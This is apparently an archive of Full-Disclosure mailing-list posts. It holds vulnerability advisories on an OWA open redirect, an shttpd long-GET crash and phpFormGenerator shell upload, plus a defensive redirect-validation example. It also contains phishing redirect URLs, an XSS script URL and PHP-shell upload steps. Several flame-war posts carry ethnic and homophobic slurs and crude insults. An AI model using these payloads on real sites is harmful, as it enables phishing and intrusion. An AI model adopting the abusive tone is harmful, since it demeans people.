Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - [MSRC7368br]
Discovered and reported 3 years ago:
http://www.google.com/search?hl=en&q=oaw+exploit+exploitlabs.com+
http://www.exploitlabs.com/files/advisories/EXPL-A-2005-001-owa.txt
http://seclists.org/fulldisclosure/2005/Feb/0101.html
http://forums.techarena.in/small-business-server/1006421.htm

Microsoft Outlook Web Access owalogon.asp Redirection Weakness
http://secunia.com/advisories/14144/

- Original Message -
From: Davide Del Vecchio [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
Sent: Friday, October 17, 2008 12:07 PM
Subject: Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - [MSRC7368br]

Hi,

I found and notified this vulnerability to Microsoft on: Tue, 10 Apr 2007 15:40:13 +0200

You read exactly: April 2007, 1 year and 6 months ago. :(

The Microsoft Security Response Center opened the case ID MSRC 7368br.

The bug has never been patched in 1 year and 6 months. I asked from time to time for updates, but they always answered me that the bug had to be patched with the next Service Pack and they did not have any ETA. This SP has still to be released.

They told me that if I released the vulnerability prior to the official patch, I could not be officially credited for that. I thought it was not a critical vuln, and so I waited. Too much (?).

I am a bit sorry for Microsoft; I think they lost another chance, since now I feel a bit tricked. I am not sure if the next time I will wait so much, and I am not sure if I will suggest to anyone to wait for the patch. I just hope Microsoft will credit me in the official patch. :(

Below you can find the first mail I wrote to MS regarding the issue.

Best regards,
Davide Del Vecchio.
From: Davide Del Vecchio [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Microsoft Outlook Web Access redir.asp Redirection Weakness
Date: Tue, 10 Apr 2007 15:40:13 +0200

Hello,

I found a weakness in Microsoft Outlook Web Access (OWA), which can potentially be exploited by malicious people to conduct phishing attacks.

The weakness is caused by a design error in the way OWA uses an unverified user-supplied argument to redirect a user after successful authentication. This can e.g. be exploited by tricking a user into following a link from an HTML document to the trusted login page with a malicious url parameter. After successful authentication, the user will be redirected to the untrusted (fake) site.

The affected product is: Microsoft Outlook Web Access ( OWA ) Windows 2003

Examples:

https://[owa-url]/exchweb/bin/redir.asp?URL=http://www.example.com
this will take the user to http://www.example.com when the login box is pressed.

https://[owa-url]/exchweb/bin/redir.asp?URL=http://www.example.com/setup.exe
prompts the user to download an executable or other file.

The attacker can then have a page to capture the user / password and redirect back to the original login page, or some other form of phishing attack.

Note that this vulnerability is very similar to the one affecting owalogin.asp described here:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0420

Best regards,
Davide Del Vecchio.

Martin Suess wrote:
...
Timeline:
- Vendor Status: MSRC tracking case closed
Vendor Notified: March 31st 2008
Vendor Response: May 6th 2008
Advisory Release: October 15th 2008
Patch available: - (vulnerability not high priority)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
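The weakness reported in the thread above is an open redirect: the login page sends the browser to whatever the URL parameter names, so the trusted login URL can be used as a hop to a phishing page. The following is an added example, not code from the thread, from Microsoft or from OWA, of the validation a login page should apply to such a parameter before redirecting. The host name, the default landing path and the function name are assumptions for illustration; the sample inputs are constructed from the examples in the post (plus the common scheme-relative, backslash and userinfo variants a reviewer would also test).

```python
# Added example (not code from the thread, from Microsoft or from OWA):
# validating a post-login redirect parameter so that the login page can
# only send the browser back into its own site.
from urllib.parse import urlsplit, urljoin, unquote

# Assumptions for illustration: the host of the trusted login page and the
# landing page to fall back to when the parameter is not acceptable.
TRUSTED_HOST = "owa.example.test"
DEFAULT_TARGET = "/exchange/"


def safe_redirect_target(url_param, trusted_host=TRUSTED_HOST,
                         default=DEFAULT_TARGET):
    """Return a site-local redirect target derived from url_param.

    Only a site-absolute path ("/exchange/inbox") or an https URL whose host
    is exactly trusted_host is honoured; everything else (another host, a
    scheme-relative "//host", a non-https scheme, control characters,
    userinfo tricks) collapses to `default`, so a link carrying
    ?URL=http://www.example.com cannot move the user off-site after login.
    """
    if not url_param:
        return default
    # Judge the decoded value, so %2F%2Fhost is seen as //host.
    candidate = unquote(url_param).strip()
    # Control characters inside the value are never legitimate.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in candidate):
        return default
    # Browsers treat a backslash like a slash ("/\host" is "//host").
    candidate = candidate.replace("\\", "/")
    # "//host" and "///host" are scheme-relative in browsers: refuse them
    # outright rather than relying on the parser's reading of them.
    if candidate.startswith("//"):
        return default
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute URL: accept only https to our own host on the default
        # port and with no userinfo ("https://trusted@evil" has hostname
        # evil; "https://evil@trusted" hides a username; reject both).
        try:
            port = parts.port
        except ValueError:
            return default
        if (parts.scheme.lower() != "https"
                or parts.hostname != trusted_host
                or port not in (None, 443)
                or parts.username is not None):
            return default
        path = parts.path or "/"
    else:
        path = parts.path
        if not path.startswith("/"):
            return default
    # Resolve dot segments against the site root and confirm the result is
    # still on our host (a path beginning "//" would otherwise change it).
    resolved = urlsplit(urljoin(f"https://{trusted_host}/", path))
    if resolved.hostname != trusted_host:
        return default
    target = resolved.path
    if parts.query:
        target += "?" + parts.query
    return target


if __name__ == "__main__":
    # Constructed inputs: the two from the post, then common variants.
    for value in ("http://www.example.com",
                  "http://www.example.com/setup.exe",
                  "//evil.example/", "/\\evil.example/", "%2F%2Fevil.example",
                  "https://owa.example.test@evil.example/",
                  "/exchange/inbox?view=all",
                  "https://owa.example.test/exchange/calendar"):
        print(f"{value!r:48} -> {safe_redirect_target(value)!r}")
```

The design choice worth noting is that the function never tries to "clean" a bad value into a good one; an unacceptable parameter is replaced wholesale by the application's own landing page, which is the only behaviour an attacker cannot influence.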
Re: [Full-disclosure] Cross site scripting issues in s9y(CVE-2008-1386, CVE-2008-1387)
SHUT THE FUCK UP!

From: n3td3v [EMAIL PROTECTED]
Re: [Full-disclosure] on xss and its technical merit
4. use xss to IFRAME or otherwise leverage a client exploit

imho this is by far worse than any of the other vectors mentioned
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
im so hurt now... you make me feel so small compared to your great worx MrReepass

stfu kthnx

- Original Message -
From: reepex [EMAIL PROTECTED]
To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Wednesday, December 12, 2007 9:01 PM
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

wow that's quite impressive.. you couldn't exploit a basic overflow and two years later someone else did. you must be quite proud. Did you tell your family and co-workers about this great finding? I hear tipping point and idefense are hiring; you should forward them this set of emails.

On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote:

One of my first advisories and was rediscovered later, turned into a viable exploit 2 years after by another researcher.
http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user
http://metasploit.com:5/EXPLOITS?MODE=SELECT&MODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77

*hugz*

- Original Message -
From: reepex [EMAIL PROTECTED]
To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Tuesday, December 11, 2007 1:58 PM
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

are you serious?
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html
I guess you are a 'brain dead india wannabe sec researcher' also?

On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote:

advisories like this are typical of brain dead India wannabe sec researchers

nuff said
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
basically i am saying i could care less, it was years ago, and i certainly do not care about your gay antics at security cons or on this or any other public forum... can you really not be any better than a worthless pile of gmail poop? or at least let everyone see your great security worx... but i seriously doubt that will happen * kinda like n3td3v's great security research / discoveries!

ciao

- Original Message -
From: reepex [EMAIL PROTECTED]
To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Thursday, December 13, 2007 10:43 AM
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

so are you now admitting your vulnerability was worthless?

On Dec 13, 2007 12:02 PM, Morning Wood [EMAIL PROTECTED] wrote:

im so hurt now... you make me feel so small compared to your great worx MrReepass

stfu kthnx

- Original Message -
From: reepex [EMAIL PROTECTED]
To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Wednesday, December 12, 2007 9:01 PM
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

wow that's quite impressive.. you couldn't exploit a basic overflow and two years later someone else did. you must be quite proud. Did you tell your family and co-workers about this great finding? I hear tipping point and idefense are hiring; you should forward them this set of emails.

On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote:

One of my first advisories and was rediscovered later, turned into a viable exploit 2 years after by another researcher.
http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user
http://metasploit.com:5/EXPLOITS?MODE=SELECT&MODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77

*hugz*

- Original Message -
From: reepex [EMAIL PROTECTED]
To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Tuesday, December 11, 2007 1:58 PM
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

are you serious?
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html
I guess you are a 'brain dead india wannabe sec researcher' also?

On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote:

advisories like this are typical of brain dead India wannabe sec researchers

nuff said
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
One of my first advisories and was rediscovered later, turned into a viable exploit 2 years after by another researcher.
http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user
http://metasploit.com:5/EXPLOITS?MODE=SELECT&MODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77

*hugz*

- Original Message -
From: reepex [EMAIL PROTECTED]
To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Tuesday, December 11, 2007 1:58 PM
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

are you serious?
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html
I guess you are a 'brain dead india wannabe sec researcher' also?

On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote:

advisories like this are typical of brain dead India wannabe sec researchers

nuff said
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
advisories like this are typical of brain dead India wannabe sec researchers

nuff said
Re: [Full-disclosure] RIPA powers being used
- Original Message -
From: James Rankin [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Tuesday, November 20, 2007 3:46 AM
Subject: [Full-disclosure] RIPA powers being used

RIPA is finally being used to force people to hand over encryption keys...
http://news.bbc.co.uk/1/hi/technology/7102180.stm

omg wtf...

In the event that there was doubt that a suspect did not possess a key, he said, it was up to the prosecution to demonstrate beyond a reasonable doubt that they could know the passphrase

ever fat finger a password? ever forgotten a password? ( I got a zip archive I protected and can't unlock due to the fact I forgot the passphrase )

looks like prosecutors and judges will now be ASSUMING guilt or innocence based on what they THINK MIGHT be true. ( if you created the passphrase you must know it )
Re: [Full-disclosure] IDS logs showing outgoing packets on port 80
Skype?

- Original Message -
From: Kelly Robinson [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Saturday, November 03, 2007 3:20 PM
Subject: [Full-disclosure] IDS logs showing outgoing packets on port 80

In our IDS logs, I notice many outgoing packets coming from port 80 (HTTP). These packets are coming from client PCs. What may be happening?
Re: [Full-disclosure] MySpace URL redirection
warning: will crash Internet Exploder.
http://profile.myspace.com/index.cfm?fuseaction=cms.goto_i=176efaa7-1908-488e-aa3e-2565dcf843d6_u=http://www.modernlifeisrubbish.co.uk/etc/crash-ie.html

redirection yes, crash no ( IE7 )
crash yes ( IE6 )
Re: [Full-disclosure] pdp architect, drraid, beastiality, and incest
Do you understand the concept of protecting people and corporations from total idiots trying to gain access to their systems? PDP just lets others know what he found, while the offending company is working on a fix, in a minimal way. If you were a true researcher, you should be able to find the same with the clues he provides. Yay for PDP not feeding script kiddies!

dunno but every sec researcher I know in the private sector would never release any info without it being fully authorized by his / her employer. Possibly we will see these idiots looking for a new job soon?
Re: [Full-disclosure] are the NetBIOS-like hacking days over? -wide open citrix services on critical domains
Netbios is quite fun over Hamachi

Subject: Re: [Full-disclosure] are the NetBIOS-like hacking days over?
Re: [Full-disclosure] Testing DidTheyReadIt.com
Outlook Express blocks this by default, unless you click the show images dialog thingie
Re: [Full-disclosure] Symantec Contact?
What's really sad is that Symantec does not have an option for the general public (i.e. Independent Virus Researchers) to submit virus samples. You have to either A. Submit it through their product. B. Have a Corporate Support contract. Guess they don't want new samples.

agree 100%, stupidity
Re: [Full-disclosure] intrusion kit
What I'm looking for is an intrusion kit, a ZIP file that contains common tools like: vnc, nmap, pwdump, ssh client, etc. That have all dependencies in the zip file, so I could do:

unzip kit.zip
cd nmap
nmap -sS localhost
cd ..
cd vnc
run-vnc-server

i guess you're so talented in breaking into boxen that you can't simply make your own SFX to do what you want.

btw: i seriously doubt anyone will help you ( or you buy the ebay offered one LOL... have fun getting yourself pwnt )

byez,
MW
Re: [Full-disclosure] Turkish hackers bring down insurer's site
http://www.smh.com.au/news/web/turkish-hackers-bring-down-insurers-site/2007/07/20/118455284.html

it's a defacement so what? Done by Turkish skriptkidz, with kidiescriptz no less ( you can bet the farm there was no data or customer information leaked... )

move along... ( nothing to see here )
Re: [Full-disclosure] Persistent XSS and CSRF and on networkappliance
For the love of god people can we stop with the hashing already?

hmm... i like hash ( and cake ) can we have a Month of Hash Cakes?
Re: [Full-disclosure] You shady bastards.
yeah, let's reply the more we can!!!

I like cake.
Re: [Full-disclosure] Yahoo 0day ActiveX Webcam Exploit
cannot reproduce..

yahoo IM versions 6.0.0.1922, 8.1.0.249
DCE2F8B1-A520-11D4-8FD0-00D0B7730277 ywcupl.dll versions 2.0.1.2 and 2.0.1.4
9D39223E-AE8E-11D4-8FD3-00D0B7730277 ywcvwr.dll versions 2.0.1.3 and 2.0.1.4
Re: [Full-disclosure] 0day Yahoo Webcam Exploits
Corrected and working: I am very sorry! Please check again

Exploit #1 new versions: 9D39223E-AE8E-11D4-8FD3-00D0B7730277 success, yahoo version 8.1.0.249
Exploit #2: no success ( black box in IE )

1 for 2 come on danny!!!
Re: [Full-disclosure] 0day Yahoo Webcam Exploits
Exploit #2: working now..
Re: [Full-disclosure] alexa.com XSS
http://thumbnails.alexa.com/update_thumbnail?url=%3Cscript%3Ealert(%22alexa%20sucks%22)%3C/script%3E

is there more to say?

Thank you, The thumbnail image for <script>alert("alexa sucks")</script> will be updated within 48 hours
Re: [Full-disclosure] iDEFENSE VCP Challenge and botnet technologies
A crack commando led by Gandhi (who showed up in boxing gloves and elastic pants) managed to destroy an Iranian building complex used to conduct Denial of Service attacks against str0ke's private IRC intelligence service. But how did he destroy the building is the real question? /str0ke

Gandhi has been known to be secretly developing a bot intra transformation chromatifier, or BITCh, for short. This appears to actually harness the power of teh bots DoS functions, via a fiber optic link to power a wave disruptor, being co developed by MI6. Digging further, reports are that an engineer by the aforementioned code name v3dt3n has been a major player in this.

This is all the info I can find for now... hope it helps,
M.Wood
Re: [Full-disclosure] Spam is funny!
Anyone else seeing this trend? I'd be curious especially to see whether or not they're targeting folks in non-IT roles. For example, do we have any veterinarians on the list who get stock spam with subjects related to animal husbandry?

yup, lots of odd topics, in particular they do appear to come from mailman lists where you have subscribed, I get spam subjects and body content from what appears to be recently discussed topics, although only security lists. ( and yes, universally they are penny stock dump spam )

mw
Re: [Full-disclosure] Why Microsoft should make windows open source
M$ will never let us h4x0rz into their source (willingly) but I agree with you James, the open source paradigm has regularly outpaced M$ and many other large corporate software producers where it comes to addressing bugs, security holes, and in many cases feature requests. Who knows... maybe they will get smart.

IMHO M$ should, and could, release an opensource OS. OpenWin, WindOS, call it whatever. Release a small basic win32 platform ( kernel / window / desktop / explorer ), that could leverage existing development tools, to allow the community to provide extensible applications that readily conform to existing, public APIs. Provided with runtime libraries already available in today's applications, the underpinning would support existing win32 applications. Packaged with win32 / cygwin versions of POSIX tools, perl, php and python, it would be a very robust, basic OS. ( reactOS + freeDOS ? )

Ooops... I forgot... this is Micro$oft I was talking about ..what we need is another Linus Torvalds to build and release a newcode win32 compliant kernel / base that uses

anyway,
M.W
Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
Fuck you too.
Larry Seltzer eWEEK.com Security Center Editor

cool Ziff-Davis lets you curse online.
Re: [Full-disclosure] CA BrightStor ARCserve Backup Mediasvr.exevulnerability
If you discover a vulnerability in CA products, please report your findings to vuln at ca dot com, or utilize our Submit a Vulnerability form at http://www3.ca.com/securityadvisor/vulninfo/submit.aspx.

Looks like a vuln is found once a week in C.A products esp in your Backup and Anti-Viri products. 3 are listed currently on your own page
http://www3.ca.com/securityadvisor/vulninfo/
and um...
http://www3.ca.com/securityadvisor/vulninfo/search.aspx?mode=tmcp&st=computer%20associates

tired of seeing C.A. exploits!!! especially the corporate products, your clients must thank you for providing remote access in EVERY PROGRAM YOU RELEASE ( i know the blackhats do ) please delete these products from your catalog.

m.w
Re: [Full-disclosure] Xbox live account stolen.
Here is my current update on the situation.
http://www.digitalmunition.com/StolenUpdate.html

It would seem to me that MS / Bungie could simply cross reference the pretexted accounts to the IP address logged in from, following the reporting of a compromised account. If it is a rather small group perpetrating this, and it appears to be, one would think investigators could track this fairly easily??? XBOX Live accounts are purchased, and have monetary value. I am sure once word got out that these pretexters were being arrested for theft, incidents would drop fairly rapidly...

PH34R T3H XB0X P0L1C3 !!!

my $0.02,
m.w
[Full-disclosure] shttpd long get request vuln ( retro )
see attached retro advisory

- EXPL-A-2006-005 exploitlabs.com Retro Advisory 002 -
- SHTTPD -

AFFECTED PRODUCTS
=
SHTTPD v1.34
http://shttpd.sourceforge.net/

OVERVIEW

SHTTPD is a lightweight web server. The main design goals are the ease of use and the ability to embed. Ideal for personal use, web-based software demos (like PHP, Perl etc), quick file sharing. Care has been taken to make the code secure

RETRO-RELEASE DATE:
===
Oct 10, 2005

Duplicate Release: Oct 06, 2006 by: sk0de
http://secunia.com/advisories/22294/

DETAILS
===
SHTTPD is vulnerable to an overly long GET request.

SOLUTION

patch: Upgrade to v1.35

PROOF OF CONCEPT

1. start SHTTPD
2. send an overly long GET request
   http://[host]/Ax274 chars ( v1.27 - v1.30 )
   http://[host]/Ax256 chars ( v1.34 )
   v1.31-v1.33 untested
2a. PoC by Sk0de http://www.milw0rm.com/exploits/2482

CREDITS
===
sk0de - http://secunia.com/advisories/22294/

RETRO-CREDITS
=
This vulnerability was discovered and researched by Donnie Werner of Exploitlabs. At the original time of discovery and retro-release date, the author was not aware of any other advisories or research by 3rd parties.

Donnie Werner
[EMAIL PROTECTED]
[EMAIL PROTECTED]
--
web: http://exploitlabs.com
http://exploitlabs.com/files/advisories/EXPL-A-2006-005-shttpd.txt
Re: [Full-disclosure] Googling:Google Meta Bugs
well... there is always this for fun... if you feel the need to...
http://www.google.com/search?hl=en&lr=&safe=off&q=%E2%96%84%E2%96%84%E2%96%88%E2%96%80%E2%96%80+%E2%96%88%E2%96%AC%E2%96%88+%E2%96%88+%E2%96%80%E2%96%88%E2%96%80

dosvidanya,
mw
Re: [Full-disclosure] non-tech: defcon and FD. :)
So, at defcon, one of the evenings, at one of the tables... several people sat. Some of them were decent and therefore shall remain nameless. When introductions were made, we realized that The others were: Morning_Wood, the bantown fa*ot spammer, and me. We have a picture together, morning, how about uploading it somewhere?

http://exploitlabs.com/gadi-scares-me.jpg

Morning_Wood was surprisingly a cool guy, as well... but I think he is a bit scared of me now that we met. :P

what me scared???. LOL, you're like a TEDDY BEAR!

n3td3v spunked:
Morning Wood's mother has just died, I don't think this is the time to poke fun... I could be wrong though ;)

at least I had one that loved life until her unexpected and untimely death, unlike your mum that drinks and turns tricks for the construction blokes down the lane for a hit off the crack pipe... eh mate? now shove off wanker!

mw
Re: [Full-disclosure] Yahoo messenger serious bug
I have a private PoC for this now for a few months, it does work ( although the PoC is slightly different and only requires one msg string to be sent ).

cheers,
MW
[Full-disclosure] Debian Development Machine Gluck Hacked - UPDATE
Debian Development Machine Hacked
http://lists.debian.org/debian-devel-announce/2006/07/msg3.html
or
http://www.zone-h.org/content/view/13853/31/

Confirmed hacked by: Linux Kernel PRCTL Core Dump Handling Privilege Escalation Vulnerability
http://www.debian.org/News/2006/20060713
or
http://www.zone-h.org/content/view/13853/31/ ( updated )
Re: [Full-disclosure] Debian Development Machine Gluck Hacked -UPDATE
David Taylor wrote:
Curious why Secunia is rating this as 'less critical'. The way I see it, this exploit could be integrated into the other exploits for mambo, joomla, phpbb, etc. Also, all of us that have websites hosted on linux machines that have a vulnerable kernel could get root? I'm thinking 'highly critical'?

considering the widespread use of that kernel, yes and yes, viable user=root exploit can be obtained from a web app vuln. ( hacking 101 here kids )
[Full-disclosure] Debian Development Machine Gluck Hacked
Debian Development Machine Hacked
http://lists.debian.org/debian-devel-announce/2006/07/msg3.html
or
http://www.zone-h.org/content/view/13853/31/
Re: [Full-disclosure] Yahoo IM spoofing
Describe the IM a little further. Receiving garbage in an IM message isn't new, and is commonly sent to everyone in a chat room via a chat-bot. The IM commonly contains URL hyperlinks to either a gambling site, or a porn site [webcam,dating,etc].

the person who sends you the IM is YOU
Re: [Full-disclosure] 70 million computers are using Windows 98 rightnow
Windows 98 has no remote exploits, only client side attacks ( IE, OE, WMP and 3rd party apps ) ( try sticking a win98 box in a dmz or direct to the Internet... It won't get owned ). I don't think it is that huge of an issue that they are abandoning its users. The impending abandonment of support for Win98 has been coming for at least 2 years
http://www.microsoft.com/windows/lifecycle/default.mspx
http://www.internetnews.com/dev-news/article.php/3298741

As a matter of fact I have a Win98 box just for a game ( Descent2 on 3dfx !!! ) and my TV tuner. Replace IE and OE with open source replacements, and the platform could be a low cost alternative that would also carry a fair degree of security for those that would like to deploy it.

One suggestion to Microsoft would be to make Win98 ( and Dos 6.2x ) available as a freeware OS since they will no longer be burdened by support, patches and etc anyway. Replace IE and OE with open source replacements, and the platform could be a low cost alternative that would also carry a fair degree of security for those that would like to deploy it. They could even open up some source code that is not used by the currently supported OS's, that could bring a good deal of support and development by the community.

my2bits,
MW
[Full-disclosure] phpFormGenerator
- EXPL-A-2006-004 exploitlabs.com Advisory 049 -
- phpFormGenerator -

AFFECTED PRODUCTS
=
phpFormGenerator v2.09
http://phpformgen.sourceforge.net/

OVERVIEW

phpFormGenerator is an easy-to-use tool to create reliable and efficient web forms in a snap. No programming of any sort is required. Just follow along the phpFormGenerator wizard and at the end, you will have a fully functional web form!

note: as stated by the vendor this script is widely used with cPanel and other hosting provider solutions.

DETAILS
===
phpFormGenerator by default installs all directories as chmod 777 and will not function if they are not set as such.

in the readme:
3. Set read+write+execute file permissions on the 'forms' directory and *everything* inside it (including all subdirectories and files)
UNIX: chmod -R 777 forms

in process2.php:
please make sure that the forms directory (and everything in it) has read+write access. you can achieve this by issuing the following command on linux/unix: chmod -R 777 forms

researcher note: when the application's directories are not set 777 the app errors with:

File and Directory permissions
The forms directory is not writeable.
The forms/admin directory is not writeable.
The use directory is not writeable.
Please give read+write permissions to all the files and directories mentioned above. Refresh this page after you have done so.

SOLUTION

vendor contact: Musawir Ali [EMAIL PROTECTED] June 30, 2006
patch: none ( see vendor response )

VENDOR RESPONSE
===
there are no security flaws ... if you had taken a moment to think, you would realize that a major software company such as cPanel would not be shipping phpFormGenerator with their scripts if it had flaws. In any case, the program has been thoroughly tested by myself and other security experts and is not known to have any issues. 777 is never forced, the suggested method is to give write permissions to the group the process belongs to.

upload function is insecure.
arbitrary php functions are insecure...

could you be any more vague? You seem to be one of those ignorant nuts who shout slogans like windows sucks linux owns your server is insecure without realizing the garbage spooling out of your mouth. you're wasting my time. btw.. just so that you know, i have been on openbsd's development team, written the opengl kit for the openbeos OS project (now Haiku), and am an official GNU maintainer: http://www.gnu.org/people/people.html (search for my name) ... what you should be doing is thinking about how to contribute to the opensource community and not being a bitch.

PROOF OF CONCEPT

1. browse to the default install directory
2. create new form with the file upload function
3. complete the form using Insert data to MySQL database table? = no
4. as directed browse to http://[host]/[appdir]/[newform_name]/form1.html
5. upload phpshell type of script
6. if you supplied an email address, the link will be sent to you
   http://[host]/[appdir]/[newform_name]/files/thescript_name_generated.php

CREDITS
===
This vulnerability was discovered and researched by Donnie Werner of exploitlabs

Donnie Werner
Information Security Specialist
[EMAIL PROTECTED]
[EMAIL PROTECTED]
--
web: http://exploitlabs.com
http://exploitlabs.com/files/advisories/EXPL-A-2006-004-phpformgen.txt
Re: [Full-disclosure] Amazon, MSN vulns and.. Yes, we know! Most sites have vulnerabilities
> What I am worried about for the moment is milw0rm. That site releases an average of 6 or 7 zero day exploits a day. It has increased the workload I have letting our IT folks know about new threats. A lot of these vulnerabilities are web/php based but pwn3d is pwn3d.

if you had a clue you would realize that the majority (my guess is 98%) of the exploits on milw0rm are not 0day, but are in fact released after vendor patches are available. (maybe str0ke could help with his guess on the percentage)

for those that are released without vendor patches, they are generally due to the fact that the vendor is:
1. not contactable
2. non responsive to the researcher
3. ignorant

in cases 2 and 3 (common) the researcher releases them to HELP bring awareness to the vendor and users that foobar software is buggy and needs to be either fixed by the vendor or removed by users and replaced by a better solution.

I suppose you would rather these float around only in the underground and then you would have NO clue as to how you got pwn3d. possibly you should have gotten into the offensive security side of things so you don't have to worry, instead of going for the classic defensive security position you obviously dread.

clue up!
MW
Re: [Full-disclosure] Amazon, MSN vulns and.. Yes, we know! Most sites have vulnerabilities
> I completely agree with the milw0rm point. The intent of my reply was to remind MW that he too was a clueless one (in recent times at that) and that he would be well served to spare others the abuse he got when he was learning. The incivility of FD and the space in general is a bit tiring.

well, i may have to also agree that my choice phrasing was a bit... immature. next time i will wait to reply after my 2 cups of coffee. (thanks for the deserved slap in the face Jason)

however, i still stand by the fact that the full disclosure style of reporting security flaws has prompted many vendors to be more diligent in fixing issues and working with persons who discover vulnerabilities, as well as doing more in-house testing and auditing.

further, IMHO, it is better to have exploit code publicly available than solely being controlled and utilized by the blackhat underground, which makes the internet an actual safer place for everyone. (see previous paragraph)

cheers,
mw
Re: [Full-disclosure] researchers want slice of profit and vow pull out of mailing list disclosures
hi n3td3v

you boast that you are moderated to people, saying that "John Cartwright is on my side cuz he lets my posts through"

hahahah what a JOKE

further, you really need to stop spamming me on Yahoo IM...

n3td3v: im about to deface zone-h
n3td3v: the joomla cms is full of vulns
n3td3v: u peice of shit
n3td3v: bye

yea, real mature there mr big international security boi
Re: [Full-disclosure] researchers want slice of profit and vow pull out of mailing list disclosures
> This is what really happened...
>
> mw: deface zone-h for me
> n3td3v: why?
> mw: cos i hate the new layout
> n3td3v: lol
> n3td3v: k give me the password to zone-h
> mw: ok, hold on n3td3v
> mw: e-mail sent, the password is in the e-mail
> n3td3v: cool, thanks
> n3td3v: lol, it works!
> n3td3v: i thought you were joking me
> mw: no probs n3td3v
> mw: just remember, this conversation never happened k?
> n3td3v: sure

here is the actual convo...

n3td3v : why did you post the i.m?
Morning Wood: just like your contryman Phill Collins says... true colors
n3td3v : hahahahahahaha... you know i.m's are easily forged
Morning Wood: yes bet we know its genuine, and i dont make up anything, thats the difference between us
n3td3v : i could post one as well saying you were going to deface zone-h too
Morning Wood: yea, you need lies
n3td3v : infact, i could post one saying you gave me exploit code to do it
n3td3v : mw: deface zone-h for me
n3td3v : n3td3v: why?
n3td3v : mw: cos i hate the new layout
n3td3v : n3td3v: lol
Morning Wood: funny, cuz im z-h staff and speak to Roberto daily
n3td3v : n3td3v: k give me the password to zone-h
Morning Wood: not to mention i showed him that when you im'd it
n3td3v : mw: ok, hold on n3td3v
n3td3v : mw: e-mail sent, the password is in the e-mail
n3td3v : n3td3v: cool, thanks
n3td3v : n3td3v: lol, it works!
n3td3v : n3td3v: i thought you were joking me
n3td3v : mw: no probs n3td3v
n3td3v : mw: just remember, this conversation never happened k?
n3td3v : n3td3v: sure

now plz go away
[Full-disclosure] microsoft france attack details
Zone-h has had an interview with the cracker who defaced http://experts.microsoft.fr and details the method of attack.

0day or corporate ignorance?

Full story:
http://www.zone-h.org/content/view/4770/31/

Donnie Werner
http://zone-h.org
http://exploitlabs.com
[Full-disclosure] Microsoft-fr defaced
Microsoft France was defaced today by Turkish hackers.
http://experts.microsoft.fr/default.aspx

a story and a mirror of the defacement are available on Zone-h

story: http://www.zone-h.org/component/option,com_frontpage/Itemid,1/
mirror: http://www.zone-h.org/index2.php?option=com_mirrorwrpid=4181592

Donnie Werner
http://zone-h.org
Re: [Full-disclosure] Want to test this desktop barrier?, (Unauthorized offer) 0day protection
Dick, err Bill,

odd product you have... anything i tried to run via GreenBorder simply, how do I say this... DID NOT RUN PERIOD. I am amazed at the effectiveness of your product, it's great! I was fully protected from not being able to do anything at all with your product, simply amazing. When I tried to run Internet Explorer, it simply would not run!!! I was obviously fully protected from all threats, again Dick, err Bill, big props to your Product!

